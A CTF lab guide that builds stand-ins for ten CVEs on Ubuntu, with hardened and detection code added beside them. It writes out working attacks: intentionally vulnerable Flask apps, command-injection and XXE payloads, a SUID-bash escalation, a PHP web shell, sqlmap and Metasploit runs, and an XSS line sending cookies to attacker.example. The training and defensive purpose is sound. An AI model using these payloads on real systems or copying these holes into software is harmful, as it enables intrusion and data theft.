Simulating Real-World Vulnerabilities for Cybersecurity Challenges

None of the affected products (PAN-OS, ScreenConnect, TorrentPier, Wacom Center, GoAnywhere MFT and so on) are installed here. Each CVE is replaced on an Ubuntu server by a stand-in that exhibits the same vulnerability class: a deliberately vulnerable framework, web application, script or open-source lab project. Treat the stand-ins as demonstrations of the bug class for CTF purposes, not as reproductions of the real exploits. Here is how to set up and run each one:


General Setup Prerequisites:

  1. Update Ubuntu:

     sudo apt update && sudo apt upgrade -y
    
  2. Install Required Tools (PHP is needed by DVWA, bWAPP and Mutillidae; docker-compose by the lab in section 3):

     sudo apt install apache2 mysql-server php libapache2-mod-php php-mysql php-gd python3 python3-pip python3-venv docker.io docker-compose -y
     sudo systemctl start apache2
     sudo usermod -aG docker $USER   # log out and back in, or prefix every docker command with sudo
    
     metasploit-framework is not in the Ubuntu repositories, so the apt line above cannot install it. Use Rapid7's installer script instead:

     curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
     chmod 755 msfinstall && sudo ./msfinstall
    

1. CVE-2024-3400 (Command Injection on GlobalProtect PAN-OS)

Simulation Steps:

  • The real flaw chained two bugs: an attacker-chosen value became a filename on disk, and that filename was later spliced unescaped into a shell command. The stand-in is a Flask app that does both in one endpoint: it builds a "touch" command from a user-supplied filename.

Flask App Simulation Code:

pip3 install flask
nano global_protect_vuln.py

(On Ubuntu 23.04 and later pip refuses system-wide installs; run "python3 -m venv venv && . venv/bin/activate" first, or use "sudo apt install python3-flask".)

Add the following code:

from flask import Flask, request
import os

app = Flask(__name__)

@app.route("/upload", methods=["POST"])
def upload():
    filename = request.form.get("filename")
    cmd = f"touch /tmp/{filename}"  # Simulates arbitrary file creation. The name goes straight into a shell string: this is the injection point.
    os.system(cmd)                  # Runs through /bin/sh, so ';', '|', '$(...)' in the name are executed.
    return "File created successfully!"

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=8080)

Run the app:

python3 global_protect_vuln.py
  • Test command injection. Note that the output of whoami goes to the terminal running the Flask app, not into the HTTP response; to prove the injection in-band, redirect the injected command's output into a file under /tmp and read that file on the server:
curl -X POST -d "filename=test; whoami" http://<your-ip>:8080/upload
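As an added example (not part of the original guide), here is the same handler logic side by side with a hardened version: a strict filename allowlist, a resolved-path check, and an argv list with no shell. The upload directory is taken from the system temp directory rather than hard-coded /tmp, which is an assumption made so the example runs anywhere.

```python
import re
import subprocess
import tempfile
from pathlib import Path

# Directory the endpoint may write into (assumption: system temp dir instead of the page's /tmp).
UPLOAD_DIR = Path(tempfile.gettempdir())
# One plain path segment: letters, digits, dot, dash, underscore. No slash, no space, no ; | & $ ` ( ).
SAFE_NAME = re.compile(r"[A-Za-z0-9._-]{1,64}")


def build_vulnerable_command(filename: str) -> str:
    """Exactly what global_protect_vuln.py hands to os.system(): the name is spliced into a shell string."""
    return f"touch /tmp/{filename}"


def create_file_safely(filename: str) -> tuple:
    """Hardened /upload handler. Returns (accepted, detail) instead of raising, to keep the demo simple."""
    if not SAFE_NAME.fullmatch(filename) or filename in (".", ".."):
        return (False, f"rejected filename {filename!r}")
    target = (UPLOAD_DIR / filename).resolve()
    # Belt and braces: even after the regex, the resolved path must stay directly inside UPLOAD_DIR.
    if target.parent != UPLOAD_DIR.resolve():
        return (False, "path escapes the upload directory")
    # argv list and shell=False: ';', '|', '$(...)' would merely be bytes in a filename, never shell syntax.
    # (If no external tool were needed at all, Path.touch() would remove the process entirely; the argv
    # form is shown because it is the general cure when a tool must be invoked.)
    subprocess.run(["touch", str(target)], check=True)
    return (True, str(target))


if __name__ == "__main__":
    for name in ("report.txt", "test; whoami", "../etc/passwd", "$(id)"):
        print(f"{name!r:20} vulnerable -> {build_vulnerable_command(name)!r}")
        print(f"{'':20} hardened   -> {create_file_safely(name)}")
```

The regex does the real work; the shell-free invocation is what makes a bypass of the regex harmless rather than fatal.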

2. CVE-2024-1709 (Authentication Bypass - ConnectWise ScreenConnect)

Simulation Steps:

  • The real flaw let an unauthenticated request reach ScreenConnect's setup wizard and create an administrator; no ScreenConnect install is used here. As a stand-in for "log in without valid credentials", set up DVWA (Damn Vulnerable Web App) and bypass a login through SQL injection.
git clone https://github.com/digininja/DVWA.git /var/www/html/dvwa
sudo cp /var/www/html/dvwa/config/config.inc.php.dist /var/www/html/dvwa/config/config.inc.php
sudo chown -R www-data:www-data /var/www/html/dvwa
sudo systemctl restart apache2
  • Browse to http://<your-ip>/dvwa/setup.php, fix anything the setup page marks red (PHP modules, the database credentials in config.inc.php), click "Create / Reset Database", log in with admin / password and set DVWA Security to Low.
  • DVWA's own login.php escapes its parameters, so sqlmap run against it reports them as not injectable. Point sqlmap at the SQL Injection module instead, passing your session cookie, and dump the users table; the password hashes in it are what you log in with as another user:
sqlmap -u "http://<your-ip>/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=<your-session-id>; security=low" --batch -D dvwa -T users --dump
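The bypass sqlmap is looking for, shown in a self-contained form as an added example (not code from the guide or from DVWA): a login routine that builds its query with string formatting next to the parameterised version. The in-memory SQLite users table is constructed for the example; SHA-256 is used only to keep it stdlib-only and is not a recommendation for password storage.

```python
import hashlib
import sqlite3


def _h(password: str) -> str:
    # Demo-only hash. Real systems need a slow, salted hash (argon2id, bcrypt, scrypt).
    return hashlib.sha256(password.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for DVWA's MySQL 'users' table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw_hash TEXT NOT NULL)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("admin", _h("correct horse battery staple")))
    conn.execute("INSERT INTO users VALUES (?, ?)", ("bee", _h("bug")))
    return conn


def login_vulnerable(conn, username: str, password: str):
    """String-built query: the username is interpreted as SQL, so the password check can be commented out."""
    sql = f"SELECT username FROM users WHERE username = '{username}' AND pw_hash = '{_h(password)}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username: str, password: str):
    """Parameterised query: the username is only ever data, whatever characters it contains."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND pw_hash = ?",
        (username, _h(password)),
    ).fetchone()
    return row[0] if row else None


def demo() -> dict:
    conn = make_db()
    bypass = "admin' -- "  # closes the string literal, then comments out the rest of the WHERE clause
    return {
        "vulnerable_bypass": login_vulnerable(conn, bypass, "wrong-password"),
        "safe_bypass": login_safe(conn, bypass, "wrong-password"),
        "safe_real_login": login_safe(conn, "admin", "correct horse battery staple"),
    }


if __name__ == "__main__":
    print(demo())
```

With the payload, the vulnerable query becomes `SELECT username FROM users WHERE username = 'admin' -- ' AND pw_hash = '...'` and returns admin without any password; the parameterised query looks for a user literally named `admin' -- ` and finds none.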

3. CVE-2024-1651 (Insecure Deserialization - TorrentPier)

Simulation Steps:

  • TorrentPier is a PHP application and the bug is an unserialize() of attacker-controlled data. By its name, the repository below is a Dirty Pipe (CVE-2022-0847, Linux kernel) lab rather than a deserialization lab; if you use it as written you get a kernel privilege-escalation exercise instead. For this section pick a lab that exposes a PHP unserialize() or Python pickle.loads() sink to user input.
git clone https://github.com/swisskyrepo/Dirty-Pipe-Exploit-Lab /home/deserialize_lab
cd /home/deserialize_lab
docker-compose up
  • Access the application:
http://<your-ip>:8000
  • Submit serialized objects whose class or function references the application resolves on load. The application's own classes are the gadgets: the attacker never uploads code, only a description of which existing code to run with which arguments.
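The whole bug class in one file, as an added example that is not the lab's or TorrentPier's code: Python's pickle stands in for PHP's unserialize(). The "gadget" here is os.makedirs creating a marker directory in a scratch location, chosen so the side effect is visible but harmless; in a real chain it would be whatever callable the application already has available.

```python
import io
import os
import pickle
import tempfile


class Exploit:
    """pickle never stores this class. __reduce__ tells it which callable to invoke on load, with
    which arguments, and that is all that ends up in the bytes."""

    def __init__(self, marker_dir: str):
        self.marker_dir = marker_dir

    def __reduce__(self):
        return (os.makedirs, (self.marker_dir,))   # gadget: any importable callable would do


def build_malicious_payload(marker_dir: str) -> bytes:
    return pickle.dumps(Exploit(marker_dir))


def build_benign_payload() -> bytes:
    return pickle.dumps({"user": "alice", "role": "user"})


def unsafe_load(data: bytes):
    """What unserialize()/pickle.loads() of user-supplied data amounts to."""
    return pickle.loads(data)


SAFE_BUILTINS = {"dict", "list", "set", "tuple", "str", "int", "float", "bool"}


class RestrictedUnpickler(pickle.Unpickler):
    """Allowlist: every global the stream asks for is checked before it is resolved."""

    def find_class(self, module, name):
        if module == "builtins" and name in SAFE_BUILTINS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def safe_load(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def attempt(loader, data: bytes) -> str:
    try:
        return f"loaded: {loader(data)!r}"
    except pickle.UnpicklingError as exc:
        return f"blocked: {exc}"


def demo() -> dict:
    with tempfile.TemporaryDirectory() as scratch:       # constructed scratch location
        marker = os.path.join(scratch, "pwned")
        payload = build_malicious_payload(marker)
        result = {"unsafe": attempt(unsafe_load, payload)}
        result["unsafe_side_effect"] = os.path.isdir(marker)   # the gadget ran during loading
        if result["unsafe_side_effect"]:
            os.rmdir(marker)
        result["safe"] = attempt(safe_load, payload)
        result["safe_side_effect"] = os.path.isdir(marker)     # nothing ran
        result["safe_benign"] = safe_load(build_benign_payload())
        return result


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The allowlist unpickler is the same shape as the RestrictedUnpickler in the Python documentation; the better fix, where the data format is under your control, is not to deserialize object graphs from untrusted input at all (JSON with explicit schema validation).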

4. CVE-2024-12552 (Local Privilege Escalation - Wacom Center)

Simulation Steps:

  • Plant a SUID-root copy of bash (the GTFOBins "SUID" technique for bash). The copy must be owned by root: if you cp as a normal user and only sudo the chmod, the SUID bit grants that user's identity, not root's.
sudo cp /bin/bash /tmp/vuln
sudo chmod u+s /tmp/vuln
  • Execute as an unprivileged user (-p stops bash from dropping the effective UID back to the real one):
/tmp/vuln -p
  • Verify root access: id should report euid=0(root). If it does not, /tmp is probably mounted nosuid (common in containers and hardened hosts) and the kernel ignores the bit; put the copy under a filesystem mounted without nosuid instead.
id
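The defender's side of this exercise, as an added example that is not part of the guide: an audit that lists set-id files and reports those not on an allowlist, equivalent to `find / -xdev -type f -perm /6000`. The allowlist of stock Ubuntu SUID binaries is constructed for the example and should be regenerated from a clean image; the demo plants a SUID file in a scratch directory rather than touching /tmp.

```python
import os
import stat
import tempfile
from pathlib import Path

# Binaries a stock Ubuntu image is expected to ship set-id (constructed allowlist; regenerate per image).
EXPECTED_SETID = {
    "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/mount", "/usr/bin/umount", "/usr/bin/fusermount3",
}


def find_setid(roots) -> list:
    """Regular files with the SUID or SGID bit set under the given roots."""
    hits = []
    for root in roots:
        for dirpath, _dirnames, filenames in os.walk(root):
            for name in filenames:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)          # lstat: never follow symlinks while auditing
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                    hits.append({
                        "path": path,
                        "uid": st.st_uid,            # uid 0 is the dangerous case; a user-owned SUID file
                        "mode": oct(stat.S_IMODE(st.st_mode)),  # only grants that user's identity
                    })
    return hits


def unexpected_setid(roots, allowlist=EXPECTED_SETID) -> list:
    return [h for h in find_setid(roots) if h["path"] not in allowlist]


def demo() -> list:
    """Constructed: a scratch directory standing in for /tmp, with one planted SUID file in it."""
    with tempfile.TemporaryDirectory() as scratch:
        planted = Path(scratch) / "vuln"
        planted.write_bytes(b"#!/bin/sh\nexit 0\n")
        os.chmod(planted, 0o4755)                   # the bit that `chmod u+s` sets
        (Path(scratch) / "harmless").write_bytes(b"data")
        return unexpected_setid([scratch])


if __name__ == "__main__":
    for hit in demo():
        print(hit)
```

Run it against `["/"]` on the CTF box before and after planting /tmp/vuln to see the diff a defender would alert on; scheduling it and diffing the output is a cheap detection for this whole class of persistence.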

5. CVE-2024-55887 (XML External Entity (XXE) Injection)

Simulation Steps:

  • Use OWASP WebGoat for XML External Entity (XXE) exercises. WebGoat also listens on 8080, so stop the Flask app from section 1 first or map a different host port:
docker pull webgoat/webgoat
docker run -p 8080:8080 webgoat/webgoat
  • Access WebGoat (register an account on first visit):
http://<your-ip>:8080/WebGoat
  • Navigate to the XXE lessons and submit a malicious XML payload. The entity is resolved on the server, so the file contents appear only where the lesson echoes the parsed value back to you:
<?xml version="1.0" ?>
<!DOCTYPE root [ <!ENTITY read SYSTEM "file:///etc/passwd"> ]>
<user>&read;</user>
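What that payload does inside a parser, as an added example (not WebGoat's code): the same XML parsed by Python's stdlib xml.sax with external general entities enabled and then with the default (disabled since Python 3.7.1). A temporary file with a constructed secret stands in for /etc/passwd so the example runs as any user.

```python
import io
import os
import tempfile
import xml.sax
from pathlib import Path
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects character data; the <user> element's text is what the application would echo back."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_user(xml_bytes: bytes, resolve_external: bool) -> str:
    parser = xml.sax.make_parser()
    # True reproduces the XXE-vulnerable configuration; False is the stdlib default.
    parser.setFeature(feature_external_ges, resolve_external)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.chunks).strip()


def build_payload(target_uri: str) -> bytes:
    # Same shape as the page's payload; only the SYSTEM identifier differs.
    return (
        '<?xml version="1.0" ?>\n'
        f'<!DOCTYPE root [ <!ENTITY read SYSTEM "{target_uri}"> ]>\n'
        "<user>&read;</user>"
    ).encode()


def demo() -> dict:
    secret = "FLAG{xxe-read-me}"                      # constructed file content
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write(secret + "\n")
    try:
        payload = build_payload(Path(f.name).as_uri())   # file:///... like the page's /etc/passwd example
        return {
            "secret": secret,
            "vulnerable": parse_user(payload, resolve_external=True),
            "hardened": parse_user(payload, resolve_external=False),
        }
    finally:
        os.unlink(f.name)


if __name__ == "__main__":
    print(demo())
```

The "hardened" case returns an empty string because the unresolved entity contributes no text; an application that needs DTDs at all should reject DOCTYPE declarations from untrusted input rather than rely on the parser flag.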

6. CVE-2024-54351 (CSRF and Stored XSS - Tom Landis Fancy Roller Scroller)

Simulation Steps:

  • Install bWAPP (Buggy Web App):
git clone https://github.com/raesene/bWAPP.git /var/www/html/bwapp
sudo chown -R www-data:www-data /var/www/html/bwapp
sudo systemctl restart apache2
  • Set the MySQL credentials in bWAPP's admin/settings.php, open its install.php in the browser to create the database, then log in with bee / bug.

  • Perform a CSRF attack. CSRF is the victim's browser submitting a request it did not intend, with the victim's own session cookie attached; a curl from your machine never demonstrates that by itself. Pick one of bWAPP's "Cross-Site Request Forgery" exercises (the file name in the original step does not exist in bWAPP), confirm with curl that the form accepts a POST carrying no anti-CSRF token, then host an HTML page that auto-submits the same form and open it while logged in:

curl -b "PHPSESSID=<victim-session>; security_level=0" -X POST "http://<your-ip>/bwapp/<csrf-exercise>.php" -d "<form fields>"

  • The stored-XSS half is a separate exercise (bWAPP's blog under "Cross-Site Scripting - Stored"): post a comment containing a script tag and reload the page; the script runs for every later visitor.
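Both halves of this CVE class in one place, as an added example that is neither bWAPP's nor the plugin's code: a comment handler without and with a session-bound CSRF token, rendering without and with output escaping, and the auto-submitting page an attacker would host. The session and comment store are in-memory dicts and lists constructed for the example.

```python
import hmac
import html
import secrets


def new_session(user: str) -> dict:
    """Server-side session; the CSRF token is bound to it and only ever embedded in the site's own forms."""
    return {"user": user, "csrf_token": secrets.token_hex(16)}


def post_comment_vulnerable(form: dict, session: dict, store: list) -> str:
    # No token check: any page the victim visits can submit this form in the victim's name (CSRF),
    # and the text is stored untouched, to be rendered raw later (Stored XSS).
    store.append((session["user"], form["text"]))
    return "stored"


def post_comment_hardened(form: dict, session: dict, store: list) -> str:
    supplied = form.get("csrf_token", "")
    if not hmac.compare_digest(supplied, session["csrf_token"]):
        return "rejected: missing or wrong CSRF token"
    store.append((session["user"], form["text"]))   # storing raw text is fine; escaping happens at output
    return "stored"


def render_vulnerable(store: list) -> str:
    return "".join(f"<p><b>{user}</b>: {text}</p>" for user, text in store)


def render_hardened(store: list) -> str:
    # Escape at output time for the HTML context: the payload stays data and is displayed as text.
    return "".join(f"<p><b>{html.escape(user)}</b>: {html.escape(text)}</p>" for user, text in store)


def csrf_poc_page(action_url: str, text: str) -> str:
    """What the attacker hosts. The victim's browser submits it, and the cookie jar goes along."""
    return (
        f'<form id="f" method="POST" action="{html.escape(action_url, quote=True)}">'
        f'<input type="hidden" name="text" value="{html.escape(text, quote=True)}">'
        "</form>"
        '<script>document.getElementById("f").submit()</script>'
    )


if __name__ == "__main__":
    session = new_session("bee")
    payload = "<script>fetch('//attacker.example/?c=' + document.cookie)</script>"
    v, h = [], []
    print(post_comment_vulnerable({"text": payload}, session, v), render_vulnerable(v))
    print(post_comment_hardened({"text": payload}, session, h))
    print(post_comment_hardened({"text": payload, "csrf_token": session["csrf_token"]}, session, h))
    print(render_hardened(h))
    print(csrf_poc_page("http://<your-ip>/bwapp/<csrf-exercise>.php", payload))
```

The two fixes are independent: the token stops other origins from submitting on the user's behalf, the escaping stops whatever did get stored from executing. SameSite=Lax cookies would block the PoC page's cross-site POST as well, but not a same-site injection, so the token stays.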

7. CVE-2022-30190 (MSDT Remote Code Execution)

Simulation Steps:

  • The real chain needs Windows: a Word document carries an external OLE relationship that fetches an HTML page, the page invokes the ms-msdt: URL handler, and the diagnostic tool runs attacker-chosen code. The stand-in below is only the last stage, an HTTP endpoint that exec()s whatever it receives; there is no document parsing in it:
pip3 install flask
nano msdt_vuln.py

Add:

from flask import Flask, request

app = Flask(__name__)

@app.route("/msdt", methods=["POST"])
def msdt():
    command = request.form.get("command")
    exec(command)  # Simulated RCE vulnerability: runs attacker-supplied Python inside the server process.
    return "Executed!"

if __name__ == "__main__":
    app.run(port=9000)  # No host argument: binds to 127.0.0.1 only, so players must reach it from the box itself.

Run:

python3 msdt_vuln.py
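Since the stand-in above skips the document stage entirely, here is the detection side of it as an added example (not from the guide): a scanner that opens a .docx as the zip it is and flags the two Follina indicators, an oleObject relationship whose target is external, and the literal ms-msdt: scheme. Flagging the scheme anywhere in the package is an assumption of this example, added for variants that embed it directly; the sample package is constructed with only the parts the scanner reads and is not a real Word file.

```python
import io
import re
import zipfile

# One <Relationship .../> element. Attribute order in OOXML is not fixed, so match the whole tag.
REL_ELEMENT = re.compile(rb"<Relationship\b[^>]*>", re.IGNORECASE)
TARGET_ATTR = re.compile(rb'Target="([^"]*)"')
EXTERNAL_MODE = re.compile(rb'TargetMode="External"', re.IGNORECASE)
MSDT_SCHEME = re.compile(rb"ms-msdt:", re.IGNORECASE)


def scan_docx(data: bytes) -> list:
    """Return a list of findings for one .docx; an empty list means nothing suspicious."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            blob = z.read(name)
            if name.endswith(".rels"):
                for m in REL_ELEMENT.finditer(blob):
                    rel = m.group(0)
                    if b"/oleObject" in rel and EXTERNAL_MODE.search(rel):
                        t = TARGET_ATTR.search(rel)
                        target = t.group(1).decode("utf-8", "replace") if t else "?"
                        findings.append(f"{name}: external oleObject relationship -> {target}")
            if MSDT_SCHEME.search(blob):          # assumption: scheme embedded in the package itself
                findings.append(f"{name}: contains the ms-msdt: URL scheme")
    return findings


def build_sample_docx(external_target: bytes = b"") -> bytes:
    """Constructed minimal package: a styles relationship plus, optionally, a Follina-style one."""
    rels = (
        b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        b'<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        b'<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
    )
    if external_target:
        rels += (
            b'<Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" '
            b'Target="' + external_target + b'" TargetMode="External"/>'
        )
    rels += b"</Relationships>"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/styles.xml", "<w:styles/>")
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    print("clean:", scan_docx(build_sample_docx()))
    print("follina-style:", scan_docx(build_sample_docx(b"http://attacker.example/stage2.html!")))
```

An external oleObject target is rare in legitimate documents, which is what makes it a usable mail-gateway rule; the ms-msdt: string on its own is the weaker signal since the real sample kept it in the fetched HTML, not in the .docx.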

8. CVE-2024-0204 (GoAnywhere MFT Auth Bypass)

Simulation Steps:

  • No stand-in is provided for this one: the Metasploit module needs a real, unpatched GoAnywhere MFT instance at <target_ip>, so this step only applies if you have one in the lab. Module paths change between Metasploit releases, so confirm the name with a search inside msfconsole before using it, and set RPORT to the port your GoAnywhere admin console actually listens on (9000 is also the port the section 7 Flask app uses, if both run on the same host):
msfconsole
search goanywhere
use exploit/linux/http/goanywhere_mft_auth_bypass
set RHOST <target_ip>
set RPORT 9000
exploit

9. CVE-2020-1472 (Netlogon Exploit - "Zerologon")

Simulation Steps:

  • Zerologon is a flaw in the Netlogon RPC authentication handshake (AES-CFB8 with an all-zero IV lets an all-zero client credential be accepted about once in 256 attempts), not in any file share. A plain Samba file server with a [netlogon] share is therefore not a target. What is needed is a domain controller: a Windows DC without the August 2020 update, or a Samba AD DC configured with "server schannel = no" (Samba's default of "server schannel = yes", in place since 4.8, already blocked the attack).
  • Provision Samba as an AD domain controller rather than as the file server the original steps describe. On Ubuntu the samba-ad-dc unit is masked, the file-server units must be stopped, and an existing smb.conf must be moved aside before provisioning:
sudo apt-get install samba krb5-user winbind
sudo systemctl disable --now smbd nmbd winbind
sudo systemctl unmask samba-ad-dc
sudo mv /etc/samba/smb.conf /etc/samba/smb.conf.bak
sudo samba-tool domain provision --use-rfc2307 --interactive
sudo nano /etc/samba/smb.conf

Add under [global] (the deliberately weak setting; remove it again to watch the tester fail):

[global]
server schannel = no

Restart:

sudo systemctl restart samba-ad-dc
  • Use Secura's tester. It is built on impacket but is not part of the impacket repository, takes the DC's NetBIOS name and IP, and makes up to 2000 authentication attempts; "Success!" means the all-zero credential was accepted:
pip3 install impacket
git clone https://github.com/SecuraBV/CVE-2020-1472
python3 CVE-2020-1472/zerologon_tester.py <DC-NETBIOS-NAME> <DC-IP>
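Why the tester needs only a few hundred tries, as an added example that is not Secura's or impacket's code: CFB8 mode written out generically, driven with the protocol's fixed zero IV and a zero client credential. A keyed SHA-256 truncated to 16 bytes stands in for AES-128 so the example is stdlib-only; that substitution is an assumption of this example, and the 1/256 argument does not depend on it.

```python
import hashlib

BLOCK = 16  # AES block size; the toy cipher keeps the same width


def cfb8_encrypt(block_encrypt, iv: bytes, data: bytes) -> bytes:
    """Generic CFB8, the mode Netlogon's ComputeNetlogonCredential uses with AES-128.
    Each output byte is plaintext XOR the first byte of E(register); the register then
    slides left by one byte and takes the new ciphertext byte."""
    assert len(iv) == BLOCK
    register = bytearray(iv)
    out = bytearray()
    for p in data:
        keystream_byte = block_encrypt(bytes(register))[0]
        c = p ^ keystream_byte
        out.append(c)
        register = register[1:] + bytes([c])
    return bytes(out)


def toy_block_cipher(key: bytes):
    """Stand-in for AES-128 (assumption: keyed SHA-256 truncated to a block, NOT AES)."""
    def encrypt(block: bytes) -> bytes:
        return hashlib.sha256(key + block).digest()[:BLOCK]
    return encrypt


def zerologon_attempt(session_key: bytes) -> bool:
    """One NetrServerAuthenticate3 call as the attacker makes it: IV fixed to zero by the protocol,
    client challenge all zero, claimed client credential all zero. The DC accepts when the credential
    it computes for that challenge is also all zeros."""
    computed = cfb8_encrypt(toy_block_cipher(session_key), bytes(BLOCK), bytes(8))
    return computed == bytes(8)


def first_keystream_byte_is_zero(session_key: bytes) -> bool:
    """The whole attack in one line: with a zero register and zero plaintext, the first ciphertext
    byte is E(0)[0]. If it is 0 the register stays all zero and every later byte is 0 as well."""
    return toy_block_cipher(session_key)(bytes(BLOCK))[0] == 0


def success_rate(n_keys: int) -> float:
    """Every attempt sees a fresh session key (the server challenge changes); about 1/256 are accepted."""
    hits = sum(zerologon_attempt(i.to_bytes(8, "big")) for i in range(n_keys))
    return hits / n_keys


if __name__ == "__main__":
    print("accepted fraction over 8192 keys:", success_rate(8192), "(expected about", 1 / 256, ")")
```

The fix Microsoft and Samba shipped is to require signed and sealed Netlogon channels for all machine accounts, which removes the attacker's ability to choose the plaintext; the CFB8 construction itself is unchanged.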

10. CVE-2024-6110 (File Upload Exploit - Magbanua Beach Resort)

Simulation Steps:

  • Use Mutillidae for unrestricted file upload:
git clone https://github.com/webpwnized/mutillidae /var/www/html/mutillidae
sudo chown -R www-data:www-data /var/www/html/mutillidae
sudo systemctl restart apache2
  • Browse to http://<your-ip>/mutillidae/, click "Setup/reset the DB" when the first page offers it, then navigate to the Unrestricted File Upload exercise.

  • Upload a PHP web shell (a web shell, not a reverse shell: it runs the command passed in the cmd query parameter and returns the output in the response, with no callback to a listener):

<?php system($_GET["cmd"]); ?>

  • Request the uploaded file with ?cmd=id appended; the response shows the account Apache runs as (www-data), which is the starting point for the rest of the challenge.
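What the upload handler should have done, as an added example that is neither Mutillidae's nor the resort application's code: the last-extension check most "images only" uploaders rely on, beside a validator that insists on a single extension, a signature matching the declared type, and a server-generated storage name. The extension and magic-byte table is constructed for the example; the page's PHP one-liner is used as sample content.

```python
import os
import re
import secrets

# Allowed extensions and the signatures each must start with (constructed allowlist).
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
STEM = re.compile(r"[a-z0-9_-]{1,64}")

PHP_WEBSHELL = b'<?php system($_GET["cmd"]); ?>'  # the page's payload, as sample content


def naive_check(filename: str) -> bool:
    """The check many uploaders do: look at whatever follows the last dot, and nothing else."""
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED


def validate_upload(filename: str, content: bytes) -> tuple:
    """Returns (accepted, stored_name_or_reason). Every decision is made on the server's terms."""
    if os.path.basename(filename) != filename or filename.startswith("."):
        return (False, "directory components and dotfiles are not allowed")   # ../x.png, .htaccess
    parts = filename.lower().split(".")
    if len(parts) != 2:                        # shell.php.jpg, shell.php%00.jpg and similar
        return (False, "exactly one extension is allowed")
    stem, ext = parts
    if not STEM.fullmatch(stem):
        return (False, "stem contains disallowed characters")
    if ext not in ALLOWED:
        return (False, f"extension .{ext} is not allowed")
    if not any(content.startswith(magic) for magic in ALLOWED[ext]):
        return (False, "content does not match the declared type")
    # Never reuse the client's name: then the client controls neither the stored path nor its extension.
    return (True, f"{secrets.token_hex(16)}.{ext}")


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8
    for name, body in (("cat.png", png), ("shell.php", PHP_WEBSHELL), ("shell.php.jpg", PHP_WEBSHELL),
                       ("cat.png", PHP_WEBSHELL), (".htaccess", b"AddType application/x-httpd-php .png")):
        print(f"{name!r:16} naive={naive_check(name)!s:5} hardened={validate_upload(name, body)}")
```

Magic bytes are a weak control on their own (a GIF header followed by PHP passes it), so the validator is only worth having together with the two server-side decisions that actually matter: uploads live in a directory where the web server executes nothing, and they are served under a name the uploader never chose.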

Final Setup for CTF Challenges:

  1. Monitoring: Use tcpdump and Wireshark. The interface is rarely called eth0 on current Ubuntu (ip link shows the real name), so capture on all interfaces:

     sudo tcpdump -i any port 80
    
  2. Flags and Clues: Place flag.txt files with encoded hints in /var/www/html/flags/. Keep that directory out of reach of the upload and web-shell exercises (sections 1 and 10), or players will read the flags through one vulnerability instead of solving the others.

  3. Snapshot: Take a VM snapshot after installation, and again before each event, so the box can be restored once players have modified it.